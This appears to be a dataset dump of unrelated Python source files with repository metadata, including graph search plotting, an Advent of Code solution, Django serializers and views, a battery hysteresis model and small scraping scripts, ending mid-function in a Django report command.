plt.annotate(self.edges[edge], center,
fontsize=15, color='black', backgroundcolor='white')
def draw_graph(self, node=True, edge=True, node_head=True, edge_label=True):
self.draw_vertices()
self.draw_edges()
def draw_tree(self, color='black'):
for to_v, head in self.vertices.items():
if head.prec:
from_u = self.positions[head.prec]
to_v = self.positions[to_v]
dx = from_u[0] - to_v[0]
dy = from_u[1] - to_v[1]
plt.arrow(to_v[0], to_v[1], dx, dy, length_includes_head=True,
head_width=0.03, head_length=0.03, shape='full', color=color)
def draw_BFS_tree(self, color='red'):
self.draw_tree(color=color)
def draw_DFS_forest(self, color='green'):
self.draw_tree(color=color)
def draw_Dijkstra_tree(self, color='magenta'): #'cyan' 'magenta'
self.draw_tree(color=color)
def draw_A_star_path(self, start, goal, color='cyan'):
self.draw_tree(color='magenta') #
to_v = goal
while to_v:
from_u = self.vertices[to_v].prec
if from_u:
to_pos = self.positions[to_v]
from_pos = self.positions[from_u]
dx = from_pos[0] - to_pos[0]
dy = from_pos[1] - to_pos[1]
plt.arrow(to_pos[0], to_pos[1], dx, dy, length_includes_head=True,
head_width=0.03, head_length=0.03, shape='full', color=color)
if from_u == start:
break
to_v = from_u
def show(self):
plt.show()
def save(self, name='graph.jpg'):
plt.savefig(name)
class MNodeGraph(NodeGraph): #save as matrix
def __init__(self):
pass
if __name__ == "__main__":
vertices = [['S', 'A', 'B', 'C'],
['A', 'S', 'D', 'E'],
['B', 'S', 'E', 'F'],
['C', 'S', 'K'],
['D', 'A', 'G'],
['E', 'A', 'B', 'G'],
['F', 'B', 'K', 'G'],
['K', 'C', 'F', 'G'],
['G', 'D', 'E', 'F', 'K']]
positions = {"S":[0.05, 0.5], #0
"A":[0.3, 0.8], #1
"B":[0.3, 0.5], #2
"C":[0.3, 0.2], #3
"D":[0.6, 0.95], #4
"E":[0.6, 0.65], #5
"F":[0.6, 0.4], #6
"K":[0.8, 0.2], #7
"G":[0.99, 0.5],} #8
weights = { ('S', 'A'): 9, ('S', 'B'): 6, ('S', 'C'): 8, ('A', 'S'): 9, ('B', 'S'): 6, ('C', 'S'): 8,
('A', 'D'): 7, ('A', 'E'): 9, ('D', 'A'): 7, ('E', 'A'): 9,
('B', 'E'): 8, ('B', 'F'): 8, ('E', 'B'): 8, ('F', 'B'): 8,
('C', 'K'): 20, ('K', 'C'): 20,
('D', 'G'): 16, ('G', 'D'): 16,
('E', 'G'): 13, ('G', 'E'): 13,
('F', 'G'): 13, ('F', 'K'): 5, ('G', 'F'): 13, ('K', 'F'): 5,
('K', 'G'): 6, ('G', 'K'): 6 }
heuristic = { "S": 20, #0
"A": 15, #1
"B": 17, #2
"C": 15, #3
"D": 11, #4
"E": 12, #5
"F": 10, #6
"K": 5, #7
"G": 0,} #8
lgraph = LNodeGraph(vertices, positions, weights, heuristic)
lgraph.BFS('S')
lgraph.draw_init()
lgraph.draw_vertices(heuristic=True)
lgraph.draw_edges(weight=True)
# lgraph.draw_BFS_tree()
# lgraph.DFS()
# lgraph.draw_DFS_forest()
# lgraph.Dijkstra('S')
# lgraph.draw_Dijkstra_tree()
lgraph.AStar('S', 'G')
lgraph.draw_A_star_path('S', 'G')
lgraph.show()
| 35.624294
| 135
| 0.505273
| 10,749
| 0.837476
| 0
| 0
| 2,219
| 0.172887
| 0
| 0
| 1,604
| 0.124971
|
b1b2da34505536ccd8a8d170d37deaec68c901e7
| 1,534
|
py
|
Python
|
Y2018/Day09.py
|
dnsdhrj/advent-of-code-haskell
|
160257960c7995f3e54f889b3d893894bc898005
|
[
"BSD-3-Clause"
] | 7
|
2020-11-28T10:29:45.000Z
|
2022-02-03T07:37:54.000Z
|
Y2018/Day09.py
|
sonowz/advent-of-code-haskell
|
160257960c7995f3e54f889b3d893894bc898005
|
[
"BSD-3-Clause"
] | null | null | null |
Y2018/Day09.py
|
sonowz/advent-of-code-haskell
|
160257960c7995f3e54f889b3d893894bc898005
|
[
"BSD-3-Clause"
] | null | null | null |
import re
class Doubly:
def __init__(self, value, prev=None, next=None):
self.value = value
self.prev = prev or self
self.next = next or self
def move(self, n):
curr = self
for i in range(abs(n)):
if n < 0:
curr = curr.prev
else:
curr = curr.next
return curr
def insert(self, v):
prev = self.prev
new_node = Doubly(v, prev, self)
prev.next = new_node
self.prev = new_node
return new_node
# Make sure 'del' this too
def delete(self):
self.prev.next = self.next
self.next.prev = self.prev
return self.value, self.next
def put_marble(t, c):
return c.move(2).insert(t)
def put_marble_23(n_player, t, c, s):
player = t % n_player
p1 = t
(p2, nc) = c.move(-7).delete()
del c
s[player] += p1 + p2
return nc, s
def game(n_player, max_turn):
c = Doubly(0)
s = [0 for i in range(n_player + 1)]
for t in range(1, max_turn + 1):
if t % 23 != 0:
c = put_marble(t, c)
else:
(c, s) = put_marble_23(n_player, t, c, s)
return s
def solve1(n_player, turn):
return max(game(n_player, turn))
def solve2(n_player, turn):
return max(game(n_player, turn * 100))
with open('09.txt') as f:
line = f.read()
[n_player, turn] = [int(x) for x in re.search(r'(\d+)[^\d]*(\d+).*$', line).groups()]
print(solve1(n_player, turn))
print(solve2(n_player, turn))
| 23.96875
| 89
| 0.541069
| 696
| 0.453716
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.036506
|
b1b3c90a89f10cc3abca5ea3c241070e29f4d3b5
| 628
|
py
|
Python
|
examples/consulta_preco.py
|
deibsoncarvalho/tabela-fipe-api
|
2890162e4436611326f0b878f647f344a8d52626
|
[
"Apache-2.0"
] | null | null | null |
examples/consulta_preco.py
|
deibsoncarvalho/tabela-fipe-api
|
2890162e4436611326f0b878f647f344a8d52626
|
[
"Apache-2.0"
] | null | null | null |
examples/consulta_preco.py
|
deibsoncarvalho/tabela-fipe-api
|
2890162e4436611326f0b878f647f344a8d52626
|
[
"Apache-2.0"
] | null | null | null |
from fipeapi import CARRO, CAMINHAO, MOTO, consulta_preco_veiculo, pega_anos_modelo, pega_modelos
from time import sleep
def consulta_preco(marca="HONDA"):
modelo = pega_modelos(tipo_veiculo=CAMINHAO, marca=marca)[0]['modelo']
print(f"\nAnos do Modelo {modelo} da {marca}:")
sleep(2)
anos = pega_anos_modelo(marca=marca, modelo=modelo, tipo_veiculo=CAMINHAO)[0]
preco = consulta_preco_veiculo(tipo_veiculo=CAMINHAO, marca=marca, modelo=modelo,
ano_do_modelo=anos['ano'], combustivel=anos['combustivel'])
print(preco)
if __name__ == '__main__':
consulta_preco()
| 36.941176
| 97
| 0.705414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 83
| 0.132166
|
b1b43acb4fa91071f5f63c2486fa86ca051d0487
| 247
|
py
|
Python
|
servo/views/tags.py
|
ipwnosx/Servo
|
3418ece690ca90d676a7d8ae654da7770ae312fb
|
[
"BSD-2-Clause"
] | null | null | null |
servo/views/tags.py
|
ipwnosx/Servo
|
3418ece690ca90d676a7d8ae654da7770ae312fb
|
[
"BSD-2-Clause"
] | null | null | null |
servo/views/tags.py
|
ipwnosx/Servo
|
3418ece690ca90d676a7d8ae654da7770ae312fb
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from django.http import HttpResponse
from servo.models import TaggedItem
def clear(request, pk):
TaggedItem.objects.get(pk=pk).delete()
return HttpResponse("")
def add(request, content_type, pk, tag):
pass
| 17.642857
| 42
| 0.696356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.101215
|
b1b47b065e5504e7082a3670697994dcf84ff418
| 853
|
py
|
Python
|
isubscribe/management/commands/announce.py
|
ilavender/sensu_drive
|
e874024aa157c7076ccc9465e9d6ae00a4f19fd0
|
[
"MIT"
] | 71
|
2016-12-25T12:06:07.000Z
|
2021-02-21T21:14:48.000Z
|
isubscribe/management/commands/announce.py
|
ilavender/sensu_drive
|
e874024aa157c7076ccc9465e9d6ae00a4f19fd0
|
[
"MIT"
] | 7
|
2016-12-23T23:18:45.000Z
|
2021-06-10T18:58:14.000Z
|
isubscribe/management/commands/announce.py
|
ilavender/sensu_drive
|
e874024aa157c7076ccc9465e9d6ae00a4f19fd0
|
[
"MIT"
] | 30
|
2017-01-01T16:18:19.000Z
|
2021-04-21T15:06:47.000Z
|
from django.core.management.base import BaseCommand, CommandError
from channels import Channel, Group, channel_layers
import json
from builtins import str
class Command(BaseCommand):
help = 'Send text announcement on notifications channel (events view)'
def add_arguments(self, parser):
parser.add_argument(
'-m',
'--message',
dest='message',
required=True,
help='announcement message text',
metavar = "MESSAGE"
)
def handle(self, *args, **options):
Group("announcement").send({
"text": json.dumps({'announce':True,
'message': options['message']
})
})
self.stdout.write('announcement done\n')
| 27.516129
| 74
| 0.52755
| 691
| 0.810082
| 0
| 0
| 0
| 0
| 0
| 0
| 192
| 0.225088
|
b1b9101a00a5671a8a714dcff7906632b6da9851
| 849
|
py
|
Python
|
jcms/models/generic_menu_item.py
|
jessielaf/jcms-pip
|
ba0580c7cf229b099c17f0286d148018dabf8aa8
|
[
"MIT"
] | null | null | null |
jcms/models/generic_menu_item.py
|
jessielaf/jcms-pip
|
ba0580c7cf229b099c17f0286d148018dabf8aa8
|
[
"MIT"
] | null | null | null |
jcms/models/generic_menu_item.py
|
jessielaf/jcms-pip
|
ba0580c7cf229b099c17f0286d148018dabf8aa8
|
[
"MIT"
] | null | null | null |
from typing import List
from django.template.defaultfilters import slugify
from jcms.models.single_menu_item import SingleMenuItem
class GenericMenuItem:
"""
Generic menu item that can be seen in the left bar in the cms
"""
def __init__(self, title: str, single_menu_items: List[SingleMenuItem], slug: str = False):
"""
:param slug: The slug the single menu items will have in front of them
:type slug: str
:param title: Display name for the MenuItem
:type title: str
:param single_menu_items: SingleMenuItems that are shown as children
:type single_menu_items: List[SingleMenuItem]
"""
if slug:
self.slug = slug
else:
self.slug = slugify(title)
self.title = title
self.single_menu_items = single_menu_items
| 30.321429
| 95
| 0.657244
| 715
| 0.842167
| 0
| 0
| 0
| 0
| 0
| 0
| 403
| 0.474676
|
b1ba9b4717e2cdd9d9bb6e7e1745006030876674
| 9,572
|
py
|
Python
|
SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py
|
davegutz/myStateOfCharge
|
d03dc5e92a9561d4b28be271d4eabe40b48b32ce
|
[
"MIT"
] | 1
|
2021-12-03T08:56:33.000Z
|
2021-12-03T08:56:33.000Z
|
SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py
|
davegutz/myStateOfCharge
|
d03dc5e92a9561d4b28be271d4eabe40b48b32ce
|
[
"MIT"
] | null | null | null |
SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py
|
davegutz/myStateOfCharge
|
d03dc5e92a9561d4b28be271d4eabe40b48b32ce
|
[
"MIT"
] | null | null | null |
# Hysteresis class to model battery charging / discharge hysteresis
# Copyright (C) 2022 Dave Gutz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation;
# version 2.1 of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# See http://www.fsf.org/licensing/licenses/lgpl.txt for full license text.
__author__ = 'Dave Gutz <davegutz@alum.mit.edu>'
__version__ = '$Revision: 1.1 $'
__date__ = '$Date: 2022/01/08 13:15:02 $'
import numpy as np
from pyDAGx.lookup_table import LookupTable
class Hysteresis():
# Use variable resistor to create hysteresis from an RC circuit
def __init__(self, t_dv=None, t_soc=None, t_r=None, cap=3.6e6, scale=1.):
# Defaults
if t_dv is None:
t_dv = [-0.09, -0.07,-0.05, -0.03, 0.000, 0.03, 0.05, 0.07, 0.09]
if t_soc is None:
t_soc = [0, .5, 1]
if t_r is None:
t_r = [1e-7, 0.0064, 0.0050, 0.0036, 0.0015, 0.0024, 0.0030, 0.0046, 1e-7,
1e-7, 1e-7, 0.0050, 0.0036, 0.0015, 0.0024, 0.0030, 1e-7, 1e-7,
1e-7, 1e-7, 1e-7, 0.0036, 0.0015, 0.0024, 1e-7, 1e-7, 1e-7]
for i in range(len(t_dv)):
t_dv[i] *= scale
t_r[i] *= scale
self.lut = LookupTable()
self.lut.addAxis('x', t_dv)
self.lut.addAxis('y', t_soc)
self.lut.setValueTable(t_r)
self.cap = cap / scale # maintain time constant = R*C
self.res = 0.
self.soc = 0.
self.ib = 0.
self.ioc = 0.
self.voc_stat = 0.
self.voc = 0.
self.dv_hys = 0.
self.dv_dot = 0.
self.saved = Saved()
def __str__(self, prefix=''):
s = prefix + "Hysteresis:\n"
res = self.look_hys(dv=0., soc=0.8)
s += " res(median) = {:6.4f} // Null resistance, Ohms\n".format(res)
s += " cap = {:10.1f} // Capacitance, Farads\n".format(self.cap)
s += " tau = {:10.1f} // Null time constant, sec\n".format(res*self.cap)
s += " ib = {:7.3f} // Current in, A\n".format(self.ib)
s += " ioc = {:7.3f} // Current out, A\n".format(self.ioc)
s += " voc_stat = {:7.3f} // Battery model voltage input, V\n".format(self.voc_stat)
s += " voc = {:7.3f} // Discharge voltage output, V\n".format(self.voc)
s += " soc = {:7.3f} // State of charge input, dimensionless\n".format(self.soc)
s += " res = {:7.3f} // Variable resistance value, ohms\n".format(self.res)
s += " dv_dot = {:7.3f} // Calculated voltage rate, V/s\n".format(self.dv_dot)
s += " dv_hys = {:7.3f} // Delta voltage state, V\n".format(self.dv_hys)
return s
def calculate_hys(self, ib, voc_stat, soc):
self.ib = ib
self.voc_stat = voc_stat
self.soc = soc
self.res = self.look_hys(self.dv_hys, self.soc)
self.ioc = self.dv_hys / self.res
self.dv_dot = -self.dv_hys / self.res / self.cap + self.ib / self.cap
def init(self, dv_init):
self.dv_hys = dv_init
def look_hys(self, dv, soc):
self.res = self.lut.lookup(x=dv, y=soc)
return self.res
def save(self, time):
self.saved.time.append(time)
self.saved.soc.append(self.soc)
self.saved.res.append(self.res)
self.saved.dv_hys.append(self.dv_hys)
self.saved.dv_dot.append(self.dv_dot)
self.saved.ib.append(self.ib)
self.saved.ioc.append(self.ioc)
self.saved.voc_stat.append(self.voc_stat)
self.saved.voc.append(self.voc)
def update(self, dt):
self.dv_hys += self.dv_dot * dt
self.voc = self.voc_stat + self.dv_hys
return self.voc
class Saved:
# For plot savings. A better way is 'Saver' class in pyfilter helpers and requires making a __dict__
def __init__(self):
self.time = []
self.dv_hys = []
self.dv_dot = []
self.res = []
self.soc = []
self.ib = []
self.ioc = []
self.voc = []
self.voc_stat = []
if __name__ == '__main__':
import sys
import doctest
from datetime import datetime
from unite_pictures import unite_pictures_into_pdf
import os
doctest.testmod(sys.modules['__main__'])
import matplotlib.pyplot as plt
def overall(hys=Hysteresis().saved, filename='', fig_files=None, plot_title=None, n_fig=None, ref=None):
if fig_files is None:
fig_files = []
if ref is None:
ref = []
plt.figure()
n_fig += 1
plt.subplot(221)
plt.title(plot_title)
plt.plot(hys.time, hys.soc, color='red', label='soc')
plt.legend(loc=3)
plt.subplot(222)
plt.plot(hys.time, hys.res, color='black', label='res, Ohm')
plt.legend(loc=3)
plt.subplot(223)
plt.plot(hys.time, hys.ib, color='blue', label='ib, A')
plt.plot(hys.time, hys.ioc, color='green', label='ioc, A')
plt.legend(loc=2)
plt.subplot(224)
plt.plot(hys.time, hys.dv_hys, color='red', label='dv_hys, V')
plt.legend(loc=2)
fig_file_name = filename + "_" + str(n_fig) + ".png"
fig_files.append(fig_file_name)
plt.savefig(fig_file_name, format="png")
plt.figure()
n_fig += 1
plt.subplot(111)
plt.title(plot_title)
plt.plot(hys.soc, hys.voc, color='red', label='voc vs soc')
plt.legend(loc=2)
fig_file_name = filename + "_" + str(n_fig) + ".png"
fig_files.append(fig_file_name)
plt.savefig(fig_file_name, format="png")
return n_fig, fig_files
class Pulsar:
def __init__(self):
self.time_last_hold = 0.
self.time_last_rest = -100000.
self.holding = False
self.resting = True
self.index = -1
self.amp = [100., 0., -100., -100., -100., -100., -100., -100., -100., -100., -100., -100.,
100., 100., 100., 100., 100., 100., 100., 100., 100., 100.]
self.dur = [16000., 0., 600., 600., 600., 600., 600., 600., 600., 600., 600., 600.,
600., 600., 600., 600., 600., 600., 600., 600., 600., 600.]
self.rst = [600., 7200., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 7200.,
3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 46800.]
self.pulse_value = self.amp[0]
self.end_time = self.time_end()
def calculate(self, time):
if self.resting and time >= self.time_last_rest + self.rst[self.index]:
if time < self.end_time:
self.index += 1
self.resting = False
self.holding = True
self.time_last_hold = time
self.pulse_value = self.amp[self.index]
elif self.holding and time >= self.time_last_hold + self.dur[self.index]:
self.index += 0 # only advance after resting
self.resting = True
self.holding = False
self.time_last_rest = time
self.pulse_value = 0.
return self.pulse_value
def time_end(self):
time = 0
for du in self.dur:
time += du
for rs in self.rst:
time += rs
return time
def main():
# Setup to run the transients
dt = 10
# time_end = 2
# time_end = 500000
pull = Pulsar()
time_end = pull.time_end()
hys = Hysteresis()
# Executive tasks
t = np.arange(0, time_end + dt, dt)
soc = 0.2
current_in_s = []
# time loop
for i in range(len(t)):
if t[i] < 10000:
current_in = 0
elif t[i] < 20000:
current_in = 40
elif t[i] < 30000:
current_in = -40
elif t[i] < 80000:
current_in = 8
elif t[i] < 130000:
current_in = -8
elif t[i] < 330000:
current_in = 2
elif t[i] < 440000:
current_in = -2
else:
current_in = 0
current_in = pull.calculate(t[i])
init_ekf = (t[i] <= 1)
if init_ekf:
hys.init(0.0)
# Models
soc = min(max(soc + current_in / 100. * dt / 20000., 0.), 1.)
voc_stat = 13. + (soc - 0.5)
hys.calculate_hys(ib=current_in, voc_stat=voc_stat, soc=soc)
hys.update(dt=dt)
# Plot stuff
current_in_s.append(current_in)
hys.save(t[i])
# Data
print('hys: ', str(hys))
# Plots
n_fig = 0
fig_files = []
date_time = datetime.now().strftime("%Y-%m-%dT%H-%M-%S")
filename = sys.argv[0].split('/')[-1]
plot_title = filename + ' ' + date_time
n_fig, fig_files = overall(hys.saved, filename, fig_files, plot_title=plot_title, n_fig=n_fig, ref=current_in_s)
plt.show()
main()
| 35.191176
| 120
| 0.531446
| 5,374
| 0.561429
| 0
| 0
| 0
| 0
| 0
| 0
| 1,878
| 0.196197
|
b1bbb7e85fba153d58638741ce35332ddf59f2bb
| 127
|
py
|
Python
|
blog/home/urls.py
|
11059/blog
|
bd3a68b4a032c24da5831aefd33f358284ca4c3d
|
[
"MIT"
] | null | null | null |
blog/home/urls.py
|
11059/blog
|
bd3a68b4a032c24da5831aefd33f358284ca4c3d
|
[
"MIT"
] | null | null | null |
blog/home/urls.py
|
11059/blog
|
bd3a68b4a032c24da5831aefd33f358284ca4c3d
|
[
"MIT"
] | null | null | null |
from django.urls import path
from home.views import IndexView
urlpatterns=[
path('', IndexView.as_view(),name='index'),
]
| 18.142857
| 47
| 0.724409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.070866
|
b1bbf9e9296a7bbda869b9c7e588aab147399325
| 1,507
|
py
|
Python
|
groundstation/proto/object_list_pb2.py
|
richo/groundstation
|
7ed48dd355051ee6b71164fc801e3893c09d11db
|
[
"MIT"
] | 26
|
2015-06-18T20:17:07.000Z
|
2019-09-26T09:55:35.000Z
|
groundstation/proto/object_list_pb2.py
|
richo/groundstation
|
7ed48dd355051ee6b71164fc801e3893c09d11db
|
[
"MIT"
] | null | null | null |
groundstation/proto/object_list_pb2.py
|
richo/groundstation
|
7ed48dd355051ee6b71164fc801e3893c09d11db
|
[
"MIT"
] | 5
|
2015-07-20T01:52:47.000Z
|
2017-01-08T09:54:07.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: groundstation/proto/object_list.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = _descriptor.FileDescriptor(
name='groundstation/proto/object_list.proto',
package='',
serialized_pb='\n%groundstation/proto/object_list.proto\" \n\nObjectList\x12\x12\n\nobjectname\x18\x01 \x03(\t')
_OBJECTLIST = _descriptor.Descriptor(
name='ObjectList',
full_name='ObjectList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='objectname', full_name='ObjectList.objectname', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=41,
serialized_end=73,
)
DESCRIPTOR.message_types_by_name['ObjectList'] = _OBJECTLIST
class ObjectList(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _OBJECTLIST
# @@protoc_insertion_point(class_scope:ObjectList)
# @@protoc_insertion_point(module_scope)
| 25.982759
| 114
| 0.760451
| 175
| 0.116125
| 0
| 0
| 0
| 0
| 0
| 0
| 439
| 0.291307
|
b1bc9799f169be42f1deb800510f1f294b2fb871
| 3,822
|
py
|
Python
|
src/google.com/get_website.py
|
IRE-Project/Data-Collector
|
9ca3efc32afe068682d334c8f833cb97ff2af36d
|
[
"MIT"
] | null | null | null |
src/google.com/get_website.py
|
IRE-Project/Data-Collector
|
9ca3efc32afe068682d334c8f833cb97ff2af36d
|
[
"MIT"
] | null | null | null |
src/google.com/get_website.py
|
IRE-Project/Data-Collector
|
9ca3efc32afe068682d334c8f833cb97ff2af36d
|
[
"MIT"
] | null | null | null |
"""@file
This file is responsible for extracting website from google search results and formatting them for later use.
"""
import json
from urllib.parse import urlparse
import nltk
import os
tc = 0
cp = 0
def find_website(raw_data):
"""
Uses several rule based techniques to find candidate websites for a company
:param raw_data:
:return: list of candidate websites
"""
if raw_data["context"] != []:
print(raw_data["context"])
website = set()
removed_tokens = ["ltd", "ltd.", "co", "co.", "limited", "services", "private", "govt", "government", "industries"
,"incorporation", "public", "pvt", "and", "&"]
c_name = [tok for tok in raw_data["query"].lower().strip().split() if tok not in removed_tokens]
for ele in raw_data["top_urls"]:
try:
domain = urlparse(ele["url"]).netloc
if "official" in ele["description"] and "website" in ele["description"]:
website.add(domain)
else:
abbreviation = "".join([tok[0] for tok in c_name])
webname = domain.split(".")
if len(webname) < 2:
continue
elif len(webname) == 2:
webname = webname[0]
else:
if webname[1] == "co":
webname = webname[0]
else:
webname = webname[1]
if nltk.edit_distance(webname, abbreviation) <= 2:
website.add(domain)
elif any((tok in domain) and (len(tok) > 4) for tok in c_name):
website.add(domain)
except Exception as e:
print(str(e), ele)
if len(website) > 0:
global tc, cp
cp += 1
tc += len(website)
# if len(website) > 1:
# print(c_name, website)
return list(website)
def get_websites(raw):
"""
get all candidate websites for all search results in raw
:param raw: google search results
:return: dict with company name and candidate websites
"""
count = 0
data = {}
for key,val in raw.items():
data[key] = {
"Company": val["query"],
"website": find_website(val)
}
count += 1
print(f"\rProgress: {count}", end="")
return data
def reformat(data, links):
"""
Reformat data to better suit the global data paradigm
:param data: unformatted data
:param links: the exhaustive linkslist used
:return: the formatted data
"""
rev_map = {}
for ele in links["data"]:
rev_map[ele[1].lower().strip()] = ele[0]
new_data = {}
for key, val in data.items():
cin = rev_map[val["Company"].lower().strip()]
new_data[cin] = val["website"]
print(len(new_data))
return new_data
def get_all_websites(dir_path):
"""
Get all websites for all files in a directory
:param dir_path: path to directory
:return: dict of unformatted comany names and candidate websites
"""
data = {}
for file_name in os.listdir(dir_path):
if file_name.endswith(".json") and file_name != "final_data.json":
file = open(dir_path + file_name)
raw = json.load(file)
file.close()
websites = get_websites(raw)
for key, val in websites.items():
data[key] = val
return data
if __name__ == "__main__":
data = get_all_websites("../../data/google.com/")
print("\n", cp, tc)
file = open("../../data/zaubacorp.com/linkslist.json")
links = json.load(file)
file.close()
data = reformat(data, links)
file = open("../../data/google.com/final_data.json", "w+")
json.dump(data, file, indent=4)
file.close()
| 27.695652
| 118
| 0.554422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,272
| 0.33281
|
b1bd684c676eed6c1630b156d59e20baabdf47e4
| 212
|
py
|
Python
|
easy/43_set_union_op.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 4
|
2021-08-02T21:34:38.000Z
|
2021-09-24T03:26:33.000Z
|
easy/43_set_union_op.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | null | null | null |
easy/43_set_union_op.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 3
|
2021-08-02T21:34:39.000Z
|
2021-08-02T21:37:16.000Z
|
from functools import reduce as rd
def main() -> int:
return len(
rd(lambda a, b: a | b, [set(input().strip().split()) for j in range(4)][1::2])
)
if __name__ == "__main__":
print(main())
| 17.666667
| 86
| 0.561321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.04717
|
b1c12120eb1970800352a4b0dd3d40166babaf18
| 2,354
|
py
|
Python
|
api/serializers.py
|
openjobs-cinfo/openjobs-api
|
b902d41fc20167727bd058a77906ddb9a83fd52f
|
[
"MIT"
] | null | null | null |
api/serializers.py
|
openjobs-cinfo/openjobs-api
|
b902d41fc20167727bd058a77906ddb9a83fd52f
|
[
"MIT"
] | null | null | null |
api/serializers.py
|
openjobs-cinfo/openjobs-api
|
b902d41fc20167727bd058a77906ddb9a83fd52f
|
[
"MIT"
] | null | null | null |
from rest_framework.serializers import ModelSerializer
from .models import Degree, Job, Skill, DataOrigin, Address, Qualification, User
class DegreeSerializer(ModelSerializer):
class Meta:
model = Degree
fields = ('id', 'name', 'description')
class AddressSerializer(ModelSerializer):
class Meta:
model = Address
fields = ('id', 'zip_code', 'country', 'state', 'city', 'street', 'street_number')
class QualificationSerializer(ModelSerializer):
class Meta:
model = Qualification
fields = ('id', 'name', 'description', 'degree_id')
class SkillRelationSerializer(ModelSerializer):
class Meta:
model = Skill
fields = ('id', 'name', 'color')
class DataOriginSerializer(ModelSerializer):
class Meta:
model = DataOrigin
fields = ('id', 'name', 'url')
class DataOriginRelationSerializer(ModelSerializer):
class Meta:
model = DataOrigin
fields = ('id', 'name')
class JobSerializer(ModelSerializer):
skills = SkillRelationSerializer(many=True, read_only=True)
origin_id = DataOriginRelationSerializer(read_only=True)
class Meta:
model = Job
fields = (
'id', 'original_id', 'url', 'number', 'title', 'state', 'created_at', 'closed_at', 'description',
'location', 'origin_id', 'skills'
)
class SkillSerializer(ModelSerializer):
class Meta:
model = Skill
fields = ('id', 'original_id', 'url', 'name', 'color', 'description', 'origin_id')
class UserSerializer(ModelSerializer):
skills = SkillRelationSerializer(many=True, read_only=True)
qualifications = QualificationSerializer(many=True, read_only=True)
class Meta:
ref_name = 'User'
model = User
fields = ('id', 'email', 'name', 'avatar_url', 'address_id', 'birth_date', 'skills', 'qualifications')
class UserCreationSerializer(ModelSerializer):
class Meta:
ref_name = 'UserCreation'
model = User
fields = (
'id', 'email', 'name', 'password', 'avatar_url', 'address_id', 'birth_date', 'skills', 'qualifications'
)
def create(self, validated_data):
instance = super().create(validated_data)
instance.set_password(validated_data['password'])
instance.save()
return instance
| 28.707317
| 115
| 0.643161
| 2,188
| 0.929482
| 0
| 0
| 0
| 0
| 0
| 0
| 520
| 0.220901
|
b1c1b0752a916c3d0a0607d4658e6692c2c8187f
| 506
|
py
|
Python
|
naive_program.py
|
silentShadow/Python-3.5
|
acbbbc88826d9168ef2af29ca465930256f67332
|
[
"MIT"
] | null | null | null |
naive_program.py
|
silentShadow/Python-3.5
|
acbbbc88826d9168ef2af29ca465930256f67332
|
[
"MIT"
] | null | null | null |
naive_program.py
|
silentShadow/Python-3.5
|
acbbbc88826d9168ef2af29ca465930256f67332
|
[
"MIT"
] | null | null | null |
import urllib.request
urls = [ "https://www.google.com","httpr://www.python.org" ]
for link in urls:
request = urllib.request.Request( link)
response = urllib.request.urlopen( request)
'''
action here
'''
'''\
NORMAL: sloooow
[][][] [][] [][]{}{} {}{}{} {}{}{} {}
THREADING: still sloow
google: [] [] [] [][] [][][][] []
python: {}{}{} {} {}{} {} {}{}
ASYNCIO: Event Loop: fastest
[] {} [] {} [] {} {}{}{} [][][] {}{} [][]
'''
| 23
| 60
| 0.420949
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 345
| 0.681818
|
b1c3d6bce2bd16b269bea21fd537024f6377ca87
| 779
|
py
|
Python
|
utils/management/commands/report_utils/msg_counts.py
|
tperrier/mwachx
|
94616659dc29843e661b2ecc9a2e7f1d4e81b5a4
|
[
"Apache-2.0"
] | 3
|
2015-05-27T14:35:49.000Z
|
2016-02-26T21:04:32.000Z
|
utils/management/commands/report_utils/msg_counts.py
|
tperrier/mwachx
|
94616659dc29843e661b2ecc9a2e7f1d4e81b5a4
|
[
"Apache-2.0"
] | 375
|
2015-01-31T10:08:34.000Z
|
2021-06-10T19:44:21.000Z
|
utils/management/commands/report_utils/msg_counts.py
|
tperrier/mwachx
|
94616659dc29843e661b2ecc9a2e7f1d4e81b5a4
|
[
"Apache-2.0"
] | 6
|
2016-01-10T19:52:41.000Z
|
2020-06-15T22:07:24.000Z
|
import collections
from django.db import models
import contacts.models as cont
def print_report(parser):
parser.print_header('Message Counts By Auto Tag')
system_msgs = cont.Message.objects.filter(is_system=True).exclude(auto='')
groups = system_msgs.order_by().values('auto').annotate(count=models.Count('id'))
auto_counts = collections.defaultdict(list)
for g in groups:
split = g['auto'].split('.')
auto_group = (split[0],int(split[-1]))
